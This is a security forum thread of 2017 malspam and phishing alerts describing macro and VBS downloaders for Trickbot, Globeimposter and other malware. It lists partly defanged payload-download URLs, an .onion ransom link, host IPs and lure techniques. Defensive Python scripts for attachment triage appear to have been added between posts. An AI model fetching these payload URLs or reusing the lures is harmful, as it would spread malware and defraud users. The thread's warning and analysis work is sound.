
SPAM frauds, fakes, and other MALWARE deliveries...


2072 replies to this topic

#2056 AplusWebMaster

  • Authentic Member
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 17 November 2017 - 08:09 AM

FYI...

Fake 'Product Enquiry' SPAM - delivers Nanocore RAT
- https://myonlinesecu...s-nanocore-rat/
17 Nov 2017 - "An email with the subject of 'Product Enquiry' pretending to come from Robert Osuna Sales <roberto. osuna76@mail .com> with a malicious Excel XLS spreadsheet attachment delivers NanoCore Remote Access Trojan...

Screenshot: https://myonlinesecu...uct_enquiry.png

These are actually coming via an automated mailing service based in Russia, who despite sending malware are complying with the various anti-spam laws worldwide by having an unsubscribe link in the email body. I do not recommend to use the -unsubscribe- link. That is an almost guaranteed way to get your email address added to a load more spam and malware lists. The blurry image in the XLS spreadsheet is a Social Engineering trick to persuade you to enable editing & content (macros) so they can infect you.
DO NOT enable Editing or Content (macros) under any circumstances:
> https://myonlinesecu...enquiry_xls.png

Product Enquiry.xls - Current Virus total detections 14/61*. Hybrid Analysis**...
This malware downloads from
 http ://cryptovoip .in/awedfs/DDF_outputCEAA78F.exe (VirusTotal 18/68[3]) (Hybrid Analysis[4])...
Email Headers and malware sites details:
191.96.249.92 - smtp4.digitalsearchengine .in - Moscow...
balajipacker .com  registered 27/09/2017 using Godaddy as registrar hosted on 191.96.249.92
cryptovoip .in 103.21.58.122 Probably a hacked compromised server not knowingly involved in hosting the malware payload...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1510851227/

** https://www.hybrid-a...vironmentId=100


3] https://www.virustot...sis/1510899976/
DDF_outputCEAA78F[1].exe

4] https://www.hybrid-a...vironmentId=100
DNS Requests
181.215.247.234
Contacted Hosts
201.174.233.241
181.215.247.234


digitalsearchengine .in: A temporary error occurred during the lookup...

cryptovoip .in: 103.21.58.122: https://www.virustot...22/information/
> https://www.virustot...d702a/analysis/
 

:ph34r: :ph34r:    <_<


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.



#2057 AplusWebMaster


Posted 23 November 2017 - 08:20 AM

FYI...

Fake 'scanned from' SPAM - delivers Ransomware
- https://myonlinesecu...opier-messages/
23 Nov 2017 - "... It is almost as if they have timed the new version to spam out on Thanksgiving day in USA, where the AV companies and security teams are off on their long weekend holiday... downloaders from the Necurs botnet... an email with the subject of 'scanned from (printer or scanner name)' pretending to come from copier@ your own email address or company domain... definitely ransomware but doesn’t look like Locky. The ransom note is very different. These all have -blank- email bodies with just an attachment and the subject...
Update I am being told it is Scarab Ransomware... The new ransom note is called 'IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT'... The subjects in this vary but are all copier or scanner related:
    Scanned from Lexmark
    Scanned from HP
    Scanned from Canon
    Scanned from Epson


P_rek.zip: Extracts to: image2017-11-22-5864621.vbs - Current Virus total detections 4/57*. Hybrid Analysis**
| Anyrun Beta[3] | Joesecurity[4] |
This downloads from (in this example, there will be -dozens- of other download sites)
 http ://pamplonarecados .com/JHgd476? (VirusTotal 8/66[5])
One of the emails looks like:
From: copier@ victimsdomain .com
Date: Thu 23/11/2017 06:28
Subject: Scanned from HP
Attachment: image2017-11-23-4360760.7z
Body content:

    EMPTY


The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1511423196/
image2017-11-22-5864621.vbs

** https://www.hybrid-a...vironmentId=100


3] https://app.any.run/...c6-8aead1ea33a8

4] https://jbxcloud.joe...s/445266/1/html

5] https://www.virustot...sis/1511422910/
JHgd476

pamplonarecados .com: 5.2.88.79: https://www.virustot...79/information/
> https://www.virustot...f655f/analysis/
 





#2058 AplusWebMaster


Posted 30 November 2017 - 08:39 AM

FYI...

Fake 'Invoice' SPAM - delivers ransomware
- https://myonlinesecu...-fake-invoices/
30 Nov 2017 - "... from the Necurs botnet... an email with an -empty- body with the subject of 'FL-610025 11.30.2017' (random numbers) pretending to come from 'Invoicing' @ random email addresses. Today it is Globeimposter -not- Locky ransomware being delivered via this malspam campaign from the Necurs botnet...
One of the emails looks like:
From: Invoicing <Invoicing@random company >
Date: Thu 30/11/2017 09:18
Subject: FL-610025 11.30.2017
Attachment: FL-610025 11.30.2017.7z

Body content: Completely empty


FL-610025 11.30.2017.7z: Extracts to: FL-432927.vbs - Current Virus total detections 9/60*. Hybrid Analysis**...
Downloads from
 http ://datenhaus .info/JHGcd476334? (as usual there will be dozens of different download sites - (VirusTotal 10/66[3])... Other download sites that I have been notified about:
mh-service .ru/JHGcd476334?
awholeblueworld .com/JHGcd476334?
... The ransom payment link is to
 http ://n224ezvhg4sgyamb .onion/sup .php where you see a pretty bland page giving this link to make enquiries... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1512033616/
FL-432927.vbs

** https://www.hybrid-a...vironmentId=100
DNS Requests
85.214.205.231
Contacted Hosts
85.214.205.231

3] https://www.virustot...sis/1512033503/
d4ddf8bf.exe

datenhaus .info: 85.214.205.231: https://www.virustot...31/information/
> https://www.virustot...3abcf/analysis/

mh-service .ru: 89.253.235.118: https://www.virustot...18/information/
> https://www.virustot...9725b/analysis/

awholeblueworld .com: 66.36.173.215: https://www.virustot...15/information/
> https://www.virustot...f30eb/analysis/
___

Persistent drive-by cryptomining...
- https://blog.malware...owser-near-you/
Nov 29, 2017 - "... we are witnessing more and more cases of abuse involving the infamous 'Coinhive' service that allows websites to use their visitors to mine the Monero cryptocurrency. Servers continue to get hacked with mining code, and plugins get hijacked and affect hundreds or even thousands of sites at once... we have come across a technique that allows dubious website owners or attackers that have compromised sites to keep mining for Monero even after the browser window is closed. Our tests were conducted using the latest version of the Google Chrome browser. Results may vary with other browsers. What we observed was the following:
  A user visits a website, which silently loads cryptomining code.
  CPU activity rises but is not maxed out.
  The user leaves the site and closes the Chrome window.
  CPU activity remains higher than normal as cryptomining continues:
> https://blog.malware...dden_mining.gif
The trick is that although the visible browser windows are closed, there is a hidden one that remains opened. This is due to a 'pop-under' which is sized to fit right under the taskbar and hides behind the clock. The hidden window’s coordinates will vary based on each user’s screen resolution... If your Windows theme allows for taskbar transparency, you can catch a glimpse of the rogue window. Otherwise, to expose it you can simply resize the taskbar and it will magically pop it back up:
> https://blog.malware.../os_compare.png
... Mitigation: This type of 'pop-under' is designed to bypass adblockers and is a lot harder to identify because of how cleverly it hides itself. Closing the browser using the “X” is no longer sufficient. The more technical users will want to run Task Manager* to ensure there is no remnant running browser processes and terminate them.
* https://www.howtogee...s-task-manager/
Alternatively, the taskbar will still show the browser’s icon with slight highlighting, indicating that it is still running:
> https://blog.malware..._mitigation.png

> https://blog.malware..._mitigation.png
... Nearly two months since Coinhive’s inception, browser-based cryptomining remains highly popular, but for all the wrong reasons. Forced mining (no opt-in) is a bad practice, and any tricks like the one detailed in this blog are only going to erode any confidence some might have had in mining as an ad replacement. History shows us that trying to get rid of ads failed before, but only time will tell if this will be any different.
Unscrupulous website owners and miscreants alike will no doubt continue to seek ways to deliver drive-by mining, and users will try to fight back by downloading more adblockers, extensions, and other tools to protect themselves. If malvertising wasn’t bad enough as is, now it has a new weapon that works on all platforms and browsers."
Indicators of compromise:
145.239.64.86,yourporn[.]sexy,Adult site
54.239.168.149,elthamely[.]com,Ad Maven popunder
52.85.182.32,d3iz6lralvg77g[.]cloudfront.net,Advertiser's launchpad
54.209.216.237,hatevery[.]info,Cryptomining site

- https://centralops.n...ainDossier.aspx
hatevery .info
'Fast Flux' network: https://www.welivese...-networks-work/

- https://www.helpnets...g-close-window/
Nov 30, 2017
 



Edited by AplusWebMaster, 01 December 2017 - 06:33 AM.



#2059 AplusWebMaster


Posted 01 December 2017 - 07:14 AM

FYI...

Fake 'Visa notification' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
1 Dec 2017 - "An email with the subject of Fwd:... (recipient’s name) pretending to come from Pamela <logo@ mensperl .edu> (probably random senders) with a malicious word doc attachment...
Update: I am reliably informed that it is Sigma ransomware[1] which appears to only run on a real computer, not a VM or Sandbox...
1] https://twitter.com/...534360148402176

Screenshot: https://myonlinesecu...sa_scan_doc.png

derek_scan.doc - Current Virus total detections 0/60*... Hybrid Analysis** (I forgot to try to insert password in the settings)
Word doc with password removed (VirusTotal 23/61***) (Hybrid Analysis[4]). This malware downloads from
 http ://ypg7rfjvfywj7jhp .onion.link/icon.jpg -renamed- to svchost.exe by-the-macro on download
(VirusTotal 24/67[5]) (Hybrid Analysis[6])...
Word doc when first opened looks like this and you need to insert the password from the email body:
> https://myonlinesecu...c_pw_needed.png
Word doc after inserting password, telling you to enable editing & content:
> https://myonlinesecu..._doc_enable.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... Do NOT enable Macros or editing under any circumstances... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1512109411/

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...sis/1512110582/

4] https://www.hybrid-a...vironmentId=100


5] https://www.virustot...aa24c/analysis/
icon.jpg

6] https://www.hybrid-a...vironmentId=100

___

Fake 'invoice' SPAM - delivers Globeimposter ransomware
- https://myonlinesecu...en-attachments/
1 Dec 2017 - "... from the Necurs botnet... an email with the subject of '12_Invoice_6856' (random numbers) coming from random email addresses... The bland email has what pretends to be a word doc attachment. It is NOT a word doc but a wrongly named .7z (zip) file. If you rename the 001_0343.doc to 001_0343.doc.7z it can be easily extracted to give a working vbs file...

Screenshot: https://myonlinesecu..._6856_email.png

001_0343.doc.7z: Extracts to: I912798654581.vbs - Current Virus total detections 9/60*. Hybrid Analysis**...

This particular example downloads from (there will be several others)
 http ://pdj .co .id/UYTd46732? (VirusTotal 7/68[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1512125181/
I912798654581.vbs

** https://www.hybrid-a...vironmentId=100
DNS Requests
202.169.44.166
Contacted Hosts
202.169.44.166
88.99.66.31


3] https://www.virustot...sis/1512125396/
UYTd46732.exe

pdj .co .id: 202.169.44.166: https://www.virustot...66/information/
> https://www.virustot...44742/analysis/
 



Edited by AplusWebMaster, 01 December 2017 - 07:41 AM.



#2060 AplusWebMaster


Posted 04 December 2017 - 08:21 AM

FYI...

'Avalanche' takedown - with 'Andromeda'
- http://blog.shadowse...with-andromeda/
Dec 4, 2017 - "On December 1st last year, the successful takedown* of the long-running criminal Avalanche double fast-flux-platform was announced by a consortium of international public and private partners, including The Shadowserver Foundation. This unprecedentedly complex operation was the culmination of over four-years of law enforcement and technical work, and impacted over twenty different malware families that utilized over 832,000 different DNS domains for Domain Generation Algorithms (DGAs) in -60- top level domains. Sinkhole data from the Avalanche platform is available each day in Shadowserver’s free of charge daily reports to national CERTs and network owners... with many victim computers still to be disinfected (you can find tools for disinfection here[1])...
* http://blog.shadowse...2/01/avalanche/
...
1] https://avalanche.shadowserver.org/
... On 29 November 2017, the Federal Bureau of Investigation (FBI), in close cooperation with the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol’s European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust and private-sector partners The Shadowserver Foundation, Microsoft, The Registrar of Last Resort, Internet Corporation for Assigned Names and Numbers (ICANN) and associated domain registries, Fraunhofer Institute for Communication, Information Processing and Ergonomics (FKIE), and the German Federal Office for Information Security (BSI), as well as law enforcement representatives from Australia, Austria, Belarus, Belgium, Canada, Finland, France, Italy, Montenegro, Netherlands, Poland, Singapore, Spain, the United Kingdom and Taiwan, announced** that they had dismantled one of the longest running malware families in existence – Andromeda (also known as Gamarue). At the same time, they also continued their existing legal and technical actions against over 848,000 Avalanche related command and control (C2) domains, to continue to protect existing victims and provide more time for any remaining victims to be identified and remediated...
** https://www.europol....cyber-operation
... They successfully extended and expanded sinkholing of the -21- malware families that made use of the Avalanche platform, and the associated takedown of the -Andromeda-botnet- is another great example of how complex international operations can successfully be jointly executed by a combination of cross-disciplinary public and private partners in the ongoing fight against cyber criminals globally."
(More detail at the URL at the top.)

> https://avalanche.sh...rver.org/stats/

> http://blog.shadowse...dromeda-map.png

> https://www.justice....known-avalanche
Dec 1, 2017 - "... The operation involves arrests and searches in five countries. More than -50- Avalanche servers worldwide were taken offline..."
Press Release Number: 16-1409
___

PayPal phish - 'verify transactions'
- https://blog.malware...ons-dont-do-it/
Dec 1, 2017 - "There’s a number of -fake- PayPal emails going around right now claiming that a 'recent transaction can’t be verified'... Here’s two examples of how these mails are being named from one of our mailboxes:
> https://blog.malware...phish-mails.jpg
Here’s the most recent email in question:
> https://blog.malware...-phish-mail.jpg
Clicking the button takes potential victims to a -fake- PayPal landing page, which tries very hard to direct them to a “resolution center”:
> https://blog.malware...anding-page.jpg
The URL is:
myaccounts-webapps-verify-updated-informations(dot)epauypal(dot)com/myaccount/e6abe

epauypal(dot)com: A temporary error occurred during the lookup...

From here, it’s a quick jump to two pages that ask for the following slices of personal information and payment data:
1. Name, street address, city, state, zip, country, phone number, mother’s maiden name, and date of birth
2. Credit card information (name, number, expiration code, security code)
> https://blog.malware...nfo-request.jpg
... Whatever your particular spending circumstance, wean yourself away from clicking on -any- email-link where claims of payment or requests for personal information are concerned. Take a few seconds to manually navigate to the website in question and log in directly instead. If there are any payment hiccups happening behind the scenes, you can sort things out from there. Scammers are banking on the holiday rush combined with the convenience of “click link, do thing” to steal cash out from under your nose..."

- https://www.helpnets...liday-phishing/
Dec 4, 2017
___

> https://www.databrea...d-major-breach/
Dec 4, 2017

> https://www.theregis...io_data_breach/
Dec 4, 2017

> http://www.tio.com/
Dec 1, 2017
 



Edited by AplusWebMaster, 04 December 2017 - 02:56 PM.



#2061 AplusWebMaster


Posted 05 December 2017 - 05:36 AM

FYI...

Fake 'Message' SPAM - delivers Globeimposter ransomware
- https://myonlinesecu...inter-messages/
5 Dec 2017 - "... downloaders from the Necurs botnet... an email with the subject of 'Message from G10PR0378651 .victimsdomain .com' pretending to come from random names at your own email address or company domain... The attachment says it is a zip file but is actually a 7z file renamed to zip...

Screenshot: https://myonlinesecu...10PR0378651.png

201712054051.zip: Extracts to: MSC000000981631.vbs - Current Virus total detections 2/59*. Hybrid Analysis**...
This particular version downloads from
 http ://rorymartin8 .info/hudgy356? (there will be dozens of others) (VirusTotal 4/56[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1512468367/
MSC000000981631.vbs

** https://www.hybrid-a...vironmentId=100
DNS Requests
192.185.193.214
Contacted Hosts
192.185.193.214

3] https://www.virustot...sis/1512468259/

rorymartin8 .info: 192.185.193.214: https://www.virustot...14/information/
> https://www.virustot...76399/analysis/
 



Edited by AplusWebMaster, 05 December 2017 - 06:50 AM.



#2062 AplusWebMaster


Posted 06 December 2017 - 06:08 AM

FYI...

Fake 'documents' SPAM - delivers Trickbot
- https://myonlinesecu...uments-malspam/
6 Dec 2017 - "... an email containing the subject of 'Confidential account documents' pretending to come from Lloyds Bank but actually coming from a look-a-like or typo-squatted domain <secure@ lloyds-commercial .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...al_trickbot.png

Protected32.doc - Current Virus total detections 3/59*. Hybrid Analysis**...
This malware docx file downloads from
 http ://undergroundis .com/images/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to Wkob.exe (VirusTotal 13/67***)... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustot...sis/1512558154/
Protected32.doc

** https://www.hybrid-a...vironmentId=100


*** https://www.virustot...sis/1512558724/

undergroundis .com: 192.254.225.208: https://www.virustot...08/information/
> https://www.virustot...8f625/analysis/
___

Google update 'glitch' disconnects student Chromebooks in schools across the U.S.
- https://www.geekwire...ols-across-u-s/
Dec 5, 2017 at 4:59 pm - "... Tens of thousands, perhaps millions, of Google Chromebooks, widely prized by schools due to their low cost and ease of configuration, were reported to be offline for several hours on Tuesday. The apparent cause? A seemingly -botched- WiFi policy update pushed out by Google that caused many Chromebooks to forget their approved network connection, leaving students disconnected.
Google first gave schools a heads-up via Twitter after the fact, indicating there was a fix.
   'We're aware of a wifi connectivity outage that affected some Chromebooks today. The issue is resolved. To get your Chromebooks online: reboot & manually join a WiFi network or connect via ethernet to receive a policy update. Sorry for the disruption & thank you for your patience.
    — Google For Education (@GoogleForEdu) December 5, 2017'
- https://twitter.com/...f_src=twsrc^tfw
That disclosure led to dismayed reaction by educators, some of whom had Chromebook installations in the thousands... GeekWire reached out to Google for more information about the cause and scope of the Chromebook issue, and will update this post if more details become available."
 
> https://cdn.geekwire...oogle120517.png

Current Status: http://downdetector.com/status/google
'Google problems last 24 hours'

>> https://support.goog.../answer/7583402
Article last updated on Dec 6, 2017
 



Edited by AplusWebMaster, 06 December 2017 - 02:37 PM.



#2063 AplusWebMaster


Posted 07 December 2017 - 08:17 AM

FYI...

Fake 'account documents' SPAM - delivers Trickbot
- https://myonlinesecu...e-form-malspam/
7 Dec 2017 - "... an email containing the subject of 'Your account documents' pretending to come from Companies House but actually coming from a look-a-like or typo-squatted domain <no-reply@ companieshouseform .co.uk> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...secure-form.png

SecureForm84.doc - Current Virus total detections 3/60* | Hybrid Analysis**... This malware docx file downloads from
 http ://aperhu .com/ser0712.png which of course is -not- an image file but a renamed .exe file that gets renamed to Ejjmdejh9.exe (VirusTotal 8/68[3])...
The alternative download location is
 http ://altarek .com/ser0712.png...
... Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services...
  companieshouseform .co.uk hosted on numerous servers and IP addresses and sending the emails via  185.207.204.218 | 185.23.215.76 | 89.39.106.208 | All of which are based in Netherlands...
Malware detail:
> https://myonlinesecu...rm_word_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustot...sis/1512651253/
SecureForm6.doc

** https://www.hybrid-a...vironmentId=100


3] https://www.virustot...sis/1512647520/
fbwnk.exe

aperhu .com: 143.95.252.46: https://www.virustot...46/information/
> https://www.virustot...001d0/analysis/

altarek .com: 64.50.184.217: https://www.virustot...17/information/
> https://www.virustot...e50bb/analysis/
 



Edited by AplusWebMaster, 07 December 2017 - 08:37 AM.

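The disguises reported in the last few posts (a .doc that is really a 7z archive, a .zip that is really 7z, a .png that is really a Windows executable) can be caught mechanically by comparing a file's leading bytes with what its extension claims. This is an added example, not code from the quoted myonlinesecurity posts; the sample "attachments" are constructed inside the script from well-known file signatures plus zero padding, and the thread's filenames are reused only as labels.

```python
"""Flag e-mail attachments whose leading bytes contradict their extension.

Added example for this thread. The sample 'attachments' are constructed
here from well-known file signatures plus zero padding; they are not
real samples, and the filenames from the thread are reused only as labels.
"""
from typing import Dict, List, Optional, Set, Tuple

# Well-known file signatures checked at offset 0: (magic bytes, type label).
SIGNATURES: List[Tuple[bytes, str]] = [
    (b"7z\xbc\xaf\x27\x1c", "7z"),                     # 7-Zip archive
    (b"PK\x03\x04", "zip"),                             # zip, also docx/xlsx
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),       # legacy .doc/.xls (OLE2)
    (b"MZ", "pe"),                                      # Windows executable
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"Rar!\x1a\x07", "rar"),
    (b"%PDF-", "pdf"),
]

# Container types that are legitimate for each claimed extension.
EXPECTED: Dict[str, Set[str]] = {
    "doc": {"ole"}, "xls": {"ole"},
    "docx": {"zip"}, "xlsx": {"zip"},
    "zip": {"zip"}, "7z": {"7z"}, "rar": {"rar"},
    "png": {"png"}, "jpg": {"jpeg"}, "jpeg": {"jpeg"},
    "pdf": {"pdf"}, "exe": {"pe"},
}


def detect_type(data: bytes) -> Optional[str]:
    """Return the type label whose signature matches the start of data."""
    for magic, label in SIGNATURES:
        if data.startswith(magic):
            return label
    return None


def check_attachment(filename: str, data: bytes) -> Dict[str, Optional[str]]:
    """Compare the extension's claim with the detected content type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = detect_type(data)
    allowed = EXPECTED.get(ext)
    if allowed is None:
        verdict = "unknown-extension"   # no policy for this extension
    elif actual is None:
        verdict = "unknown-content"     # no known signature matched
    elif actual in allowed:
        verdict = "ok"
    else:
        verdict = "mismatch"            # e.g. 7z bytes inside a ".doc"
    return {"filename": filename, "extension": ext,
            "actual": actual, "verdict": verdict}


def suspicious(attachments: Dict[str, bytes]) -> List[str]:
    """Names of attachments whose content type contradicts the extension."""
    return [name for name, data in attachments.items()
            if check_attachment(name, data)["verdict"] == "mismatch"]


def _constructed(magic: bytes, size: int = 64) -> bytes:
    """Build a fake file body: a real signature followed by zero padding."""
    return magic + b"\x00" * (size - len(magic))


# Constructed samples mirroring the renaming tricks described in the thread.
SAMPLES: Dict[str, bytes] = {
    "001_0343.doc": _constructed(b"7z\xbc\xaf\x27\x1c"),      # 7z named .doc
    "201712054051.zip": _constructed(b"7z\xbc\xaf\x27\x1c"),  # 7z named .zip
    "logo.png": _constructed(b"MZ\x90\x00\x03\x00"),          # PE named .png
    "quarterly.doc": _constructed(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"),  # real OLE
    "report.docx": _constructed(b"PK\x03\x04"),               # real OOXML (zip)
    "notes.txt": b"plain text, no policy for .txt",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        r = check_attachment(name, data)
        print(f"{r['filename']:20} ext={r['extension']:5} "
              f"actual={r['actual']}  {r['verdict']}")
    print("suspicious:", suspicious(SAMPLES))
```

Signatures are matched only at offset 0, so this catches the renaming trick above but is not a general file-type identifier; a mail gateway would typically run it on each decoded MIME part before the attachment reaches a user.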


#2064 AplusWebMaster


Posted 12 December 2017 - 07:14 AM

FYI...

Fake 'Amazon invoice' SPAM - delivers Trickbot
- https://myonlinesecu...-necurs-botnet/
12 Dec 2017 - "... Necurs botnet has changed again today...
Update: I am informed that this is definitely Trickbot banking trojan, not ransomware, although several antiviruses are detecting it as a ransomware version. An email with the subject of 'Invoice RE-2017-12-12-00572' (random numbers after the date) pretending to come from Amazon Marketplace <lqftdwbmxYYfT@ marketplace.amazon .com> (random characters before the @) with a malicious word doc attachment...

Screenshot: https://myonlinesecu...marketplace.png

RE-2017-12-12-00572.doc - Current Virus total detections 12/59*. Hybrid Analysis**...
This malware downloads from
 http ://ragazzemessenger .com/nyRhdkwSD which gave ejmaryj8.exe (VirusTotal 9/67[3]) (Hybrid Analysis[4])...
There will be loads of other download sites... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustot...sis/1513080354/
RE-2017-12-12-00775.doc

** https://www.hybrid-a...vironmentId=100


3] https://www.virustot...sis/1513080273/

4] https://www.hybrid-a...vironmentId=100

ragazzemessenger .com: 98.124.251.168: https://www.virustot...68/information/
> https://www.virustot...c4c38/analysis/
 





#2065 AplusWebMaster


Posted 15 December 2017 - 05:12 AM

FYI...

Fake 'Scan' SPAM - delivers Globeimposter ransomware
- https://myonlinesecu...ware-but-fails/
15 Dec 2017 - "... Necurs botnet has messed up again today... an email with the subject of 'Scan' pretending to come from random names and email addresses... It is trivially easy to decode the base64 section, create the 7z file & extract the vbs to get the Globeimposter ransomware they are attempting to deliver. Over the last few weeks we have seen this behaviour several times. Sometimes with 7z or zip files. Sometimes with word docs...

Screenshot: https://myonlinesecu...15_08-02-13.png

Scan_00057.7z: - Extracts to: Scan_005287.vbs - Current Virus total detections 7/60*. Hybrid Analysis**...
This particular version downloads from
  http ://peopleiknow .org/JKHhgdf72? - there will be several other locations in -other- vbs files...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1513324220/
Scan_005287.vbs

** https://www.hybrid-a...vironmentId=100

peopleiknow .org: 67.210.102.240: https://www.virustot...40/information/
> https://www.virustot...43e61/analysis/
___

Fake FBI phish - leads to Tech Support Scam
- https://myonlinesecu...h-support-scam/
14 Dec 2017 - "... It pretends to be a message from the FBI saying you might be a victim of cyber crime and you should ring the phone number in the email. The phone number belongs to a dubious Tech Support service:
globalphonesupport .com: 69.89.31.186: https://www.virustot...86/information/

If you are unwise enough to ring the number you will be falsely told that there is something wrong with your computer. 'It needs cleaning'... and it will cost you at least one hundred USD to repair.
It is highly likely that these scammers will ask you to install a 'remote access program' (although they call it something else)...
Unusually there is no link in this email. [Some] of these scams will have a link that leads to page saying your computer is infected with Zeus trojan or similar that locks-the-browser and displays the phone number to ring...

Screenshot: https://myonlinesecu...upport-Scam.png

" ... RE: Case: 8755174734
The IP address registered on your name was referred to our ICC Center multiple times as being a possible victim of cyber crime.
We believe that your IP address and other identifying information were used to commit several computer fraud and abuse crimes. This investigation covers the time period from August 7, 2017 to the present date.
We appreciate your instant assistance to this matter. Please contact us urgently with all of the information concerning this case, at telephone number listed below...
"

These emails use Social engineering tricks to persuade you to open the attachments, follow links or ring the phone number in the email...
___

AIM - discontinued on Dec 15, 2017
- https://help.aol.com...im-discontinued
"As of December 15, 2017, AOL Instant Messenger products and services will be shut down and will no longer work.
If you are an AOL member, AOL products and services like AOL Mail, AOL Desktop Gold and Member Subscriptions will not be affected. To view your benefits, please visit: https://mybenefits.aol.com/ "
 

:ph34r: :ph34r:    <_<


Edited by AplusWebMaster, 15 December 2017 - 10:07 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
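The triage step the quoted post describes (decode the base64 section, identify the container, look at what is inside without running it), as an added Python example that is not part of the post or of the myonlinesecurity write-up. It builds its own constructed sample message carrying a zip with a placeholder .vbs; the real lure used 7z, which Python's standard library cannot open, so the example recognises 7z by its magic bytes and stops there. The sender address, file names and script contents are made up for the demonstration.

```python
"""Offline triage of a suspicious e-mail attachment: undo the base64 transfer
encoding, identify the real container type from its magic bytes, and for zip
archives list the members and flag script files. Nothing extracted is run."""
import email
import hashlib
import io
import zipfile
from email import policy
from email.message import EmailMessage

# Leading bytes of the container types these campaigns have used.
MAGIC = {
    b"7z\xbc\xaf\x27\x1c": "7z archive",
    b"PK\x03\x04": "zip archive",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "OLE2 document (legacy .doc/.xls)",
    b"MZ": "Windows PE executable",
}
# Windows Script Host / HTA / PowerShell extensions worth flagging inside an archive.
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1")


def identify(data: bytes) -> str:
    """Name the container by magic bytes, ignoring whatever extension it carries."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def triage_message(raw: bytes) -> list:
    """One record per attachment: declared name, real type, sha256 (for a
    VirusTotal lookup), and any script members found inside a zip."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True)  # decodes the base64 section
        kind = identify(data)
        record = {
            "filename": part.get_filename(),
            "type": kind,
            "sha256": hashlib.sha256(data).hexdigest(),
            "scripts": [],
        }
        if kind == "zip archive":
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                record["scripts"] = [n for n in zf.namelist()
                                     if n.lower().endswith(SCRIPT_EXT)]
        findings.append(record)
    return findings


def build_sample_eml() -> bytes:
    """Constructed sample, not a captured message: a 'Scan' lure whose zip
    holds a placeholder .vbs (one comment line, not a real downloader)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Scan_005287.vbs", "' placeholder, not a real downloader\r\n")
    msg = EmailMessage()
    msg["From"] = "random.name@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Scan"
    msg.set_content("See attached scan.")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename="Scan_00057.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in triage_message(build_sample_eml()):
        print(finding)
```

The sha256 is what you paste into VirusTotal or Hybrid Analysis; identifying by magic bytes rather than by the declared name is the point, since the same campaigns have shipped .jpg, .doc and .7z names over whatever the real payload was.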



#2066 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 20 December 2017 - 07:34 AM

FYI...

Fake 'Website Job Application' SPAM - delivers malware
- https://myonlinesecu...ferent-malware/
20 Dec 2017 - "... This is a continuation from these 3 previous posts about malware using resumes or job applications as the lure [1] [2] [3]... The primary change in delivery method is the use of a password for the word doc to try to bypass antivirus filters... Today’s version continues to deliver the SmokeLoader/Sharik trojan which is a downloader for -other- malware. An email with the subject of 'Website Job Application' coming from Rob Meyers <Gong@ latestmistake .com> (probably random names) with a malicious word doc attachment delivers SmokeLoader/Sharik trojan...
1] https://myonlinesecu...obe-ransomware/
2] https://myonlinesecu...ads-to-malware/
3] https://myonlinesecu...eliver-malware/

Screenshot: https://myonlinesecu...esume_eml-1.png

Rob Resume.doc - Current Virus total detections 11/59*. Hybrid Analysis**... It should be noted that this malicious word doc and the downloaded malware either have some sort of anti-analysis protection or the malware delivery site will reject connections from known sandboxes, VM analysis tools and known researcher or antivirus IP addresses. Neither of the 2 Online sandboxes / analysis tools could retrieve the downloaded malware. That had to be done manually. They have continued with the previous behaviour of using BITS (bitsadmin.exe) to download the file instead of PowerShell. They also are still using “autoclose” in the macro so it doesn’t run until the word doc has been closed, so avoiding any obvious signs of infiltration. Also the downloaded file sleeps for a long, long time before doing anything. This malware downloads from
